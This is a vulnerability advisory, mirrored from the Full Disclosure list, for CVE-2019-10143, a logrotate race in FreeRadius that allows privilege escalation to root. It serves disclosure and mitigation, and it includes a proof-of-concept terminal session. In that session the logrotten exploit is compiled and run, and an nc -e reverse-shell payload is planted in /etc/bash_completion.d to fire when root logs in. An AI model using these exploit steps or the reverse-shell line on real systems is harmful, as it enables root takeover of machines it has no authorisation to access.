Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

[AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius

Related Vulnerabilities: CVE-2019-10143  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="15"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="15"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">[AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: sec-advisory &lt;sec-advisory () ait ac at&gt;


<em>Date</em>: Fri, 15 Nov 2019 09:05:43 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;"># Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: <a rel="nofollow" href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a>
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](<a rel="nofollow" href="https://freeradius.org/">https://freeradius.org/</a>)

## Vulnerability Description
The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can elevate the privileges to 
"root" because of an unsafe interaction with logrotate.
User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not 
use the "su" directive:

```
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
```

Since logrotate is prone to a race-condition(see 
<a rel="nofollow" href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>) it is possible for user "radiusd" to 
replace the

directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). 
logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to 
"radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse 
shell will be executed then.

Details of the race-condition in logrotate can be found at:

*   <a rel="nofollow" href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>
*   <a rel="nofollow" href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a>
*   <a rel="nofollow" href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a>

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user "radiusd", can elevate his 
privileges to "root". After downloading and compiling, the exploit gets executed and waits until the next daily run of 
logrotate.  If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be 
written into /etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets executed 
and opens a shell on the attackers netcat listener:

```
radiusd@redhat7:~$ git clone <a rel="nofollow" href="https://github.com/whotwagner/logrotten.git">https://github.com/whotwagner/logrotten.git</a> /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten &amp;&amp; gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to 
/etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd     33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi" &gt; 
/etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges to "root". The fact that 
another exploit is needed to get a shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories he can write to.

## References:
*  <a rel="nofollow" href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a>
*  <a rel="nofollow" href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a>

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows 
an attacker to gain a shell as user "radiusd"]( <a rel="nofollow" href="https://freeradius.org/security/">https://freeradius.org/security/</a>).  CVE's are not only assigned for 
vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. 
Therefore we believe that it is important to file this issue as a security related bug.

## Advisory URL
<a rel="nofollow" href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a>

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="15"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="15"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>[AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius</strong> <em>sec-advisory (Nov 15)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started